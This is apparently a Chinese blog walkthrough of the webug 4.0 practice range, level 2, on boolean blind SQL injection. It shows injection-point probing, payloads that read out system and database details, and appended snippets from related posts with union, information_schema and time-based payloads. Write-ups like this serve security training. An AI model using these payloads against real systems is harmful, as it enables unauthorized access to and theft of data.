webug 4.0 第二关 布尔注入

最新推荐文章于 2024-03-28 09:49:53 发布
最新推荐文章于 2024-03-28 09:49:53 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: webug 4.0 文章标签: 渗透 靶场 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ONS_cukuyo/article/details/88038005
版权

 

感谢webug团队一直以来的更新维护!

webug是什么

WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。

Webug官网:http://www.webug.org

Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43BuOjhPqkJBvcw 提取码: 3xpy

来源:226安全团队

微信号:safeteam226

开始打靶

页面上一节我们已经观察过了,这次我们就直接开始思考,并且还是猜测sql为:

select * from table where id = $id+(后面可能有的限制语句或嵌套查询语句等等,因此我都习惯在注入语句后面跟注释符屏蔽这些可能的干扰)

标题说的是布尔注入,那么首先想到的就是使用and 1=2、and '1'='2等等来让页面产生变化,比如没有原来的某些数据(可以通过这里确定sql语句结果的显示位置,从而采用union方式)或者给一个报错的页面,从而让我们确定布尔注入点在哪。

接下来让我们依次尝试把。

假设$id为数字型:

url?id=1 and 1=2 %23,无反应

假设$id为字符型:

括号:url?id=1) and 1=2 %23,无反应

双引号:url?id=1" and 1=2 %23,无反应

单引号:url?id=1' and 1=2 %23,有反应了,没有数据了

至此,我们就找到了布尔注入点,接下来就可以通过这个注入点获取我们的想要的信息。

比如操作系统名

url?id=1' and "Win32"=@@version_compile_os %23

比如用户名长度

url?id=1' and length(user())<15 %23

url?id=1' and length(user())=15 %23

url?id=1' and length(user())>15 %23

 

2019/5/17:增加查询Flag

这个太麻烦了,有毅力的读者请参照第一关的思路来弄吧,弄的时候需要注意flag值可能在其他表、其他库。

柴月和岐月
关注
专栏目录
webug4.0通笔记---(第一天:布尔注入)
liver100day的博客
04-23 670
布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
webug-布尔注入
我只会装360的博客
09-17 885
布尔注入是盲注之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 substr(a,b,c)      从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符 mid(a,b,c) ...
Webug4.0 sql布尔注入
angry_program的博客
01-04 624
布尔注入也叫布尔型盲注手工注入, 虽然可以使用工具一步完成, 但是最好还是需要懂得原理 布尔布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。 盲注 在注入时页面无具体数据返回的注入称之为盲注,一般是通过其他表现形式来判断数据的具体内容 ps: 这就区别与上篇文章的Webug4.0 sql显错注入中会直接返回错误信息...
webug--布尔注入
gclome的博客
05-09 722
访问靶场: (1)判断注入点 输入id=1’有反应 (2)判断字段数 利用二分法,可以判断出字段数为2 id=1' order by 2 %23 (3)爆出当前数据库名 id=1' union select 1,database() %23 爆出数据库名为webug (4)爆出当前数据库下的表 id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug'%2
webug 2、布尔注入
乔木同学
03-15 4713
webug第二布尔注入
我的Webug之路:第二(基础篇)
weixin_45822019的博客
03-14 296
第一步:拿到网页来发现网页是否存在问题 第二步:发现并不存在xss,按照网页提示下载到本地查看照片存在什么信息 使用WinHex查看照片的十六进制 第三步:将照片后缀名改为.zip来查看隐藏的是什么文件 ...
Webug4.0靶场笔记(第一天)--------显错注入布尔注入
Yasso的博客
02-20 1061
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
Webug4.0靶场笔记(第二天)--------延时注入和post注入
Yasso的博客
02-20 812
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
webug4.0通笔记----(第一天:显错注入
liver100day的博客
04-23 763
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
webug4.0—布尔注入
Stephen Wolf
01-09 677
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。 Length()函数 返回字符串的长度 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 left(da...
webug4.0布尔注入-2
weixin_34405925的博客
03-14 3965
/*做这个到最后爆表的时候手工终于爆完了,然后发现爆错表了真是暴风哭泣*/   布尔注入是盲注之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 1. left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 2. substr(a,b,c)      从字符串a的...
Webug4.0靶场
天行健,君子以自强不息
02-05 3253
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
webug4.0总结篇
Xor0ne
06-14 1651
今天webug考验结束了。做一个小总结吧! webug是什么? WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org Webug 4.0百度云地址: https://pan.baidu.com/s/1euUY4UG43Bu
webug4.0靶场笔记
qq_47289634的博客
07-13 1788
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的。打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样。
Webug4.0 打靶笔记
m0_60716947的博客
05-11 4197
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
探秘WeBug 4.0Web安全检测的新里程碑
最新发布
gitblog_00024的博客
03-28 453
探秘WeBug 4.0Web安全检测的新里程碑 项目地址:https://gitcode.com/wangai3176/webug4.0 在网络安全日益重要的今天,WeBug 4.0 是一款强大的Web应用漏洞扫描工具,帮助开发者和安全专家识别并修复潜在的安全问题。它以其高效、易用和深度扫描的特点,为Web应用程序的安全性提供了一道坚实的防线。 项目简介 WeBug 4.0是一款开源的Web安...
Webug4.0显错注入
weixin_44253823的博客
12-11 209
进入页面,输入单引在id=1后面加单引号页面报错。 构造查询语句1’ or 1=1%23页面正常显示。 利用order by 语句判断字段数。由1开始输入,输入3时报错,因此判断字段个数是两个。 利用version()语句获得当前数据库版本5.5.53 查询数据库名称 查看webug数据库中的内容。 查看flag表中的内容。 查看flag列中的内容。 得到flag中数据。 ...
webug4.0-显错注入
nex1less的博客
08-25 1041
webug4.0-显错注入
webug4.0—显错注入
Stephen Wolf
01-09 379
所用到一些知识: 1. concat(str1,str2,...) 返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符地连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)  连接一个组的所有字符串,...
第3:花式索引与布尔索引
05-27
好的,让我们来聊聊花式索引和布尔索引。 首先,花式索引是指使用整数数组来索引数组的操作,这种索引方式可以让我们快速地获取数组中的元素。例如,我们可以通过以下方式获取数组中的第1、3、5个元素: ```python...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值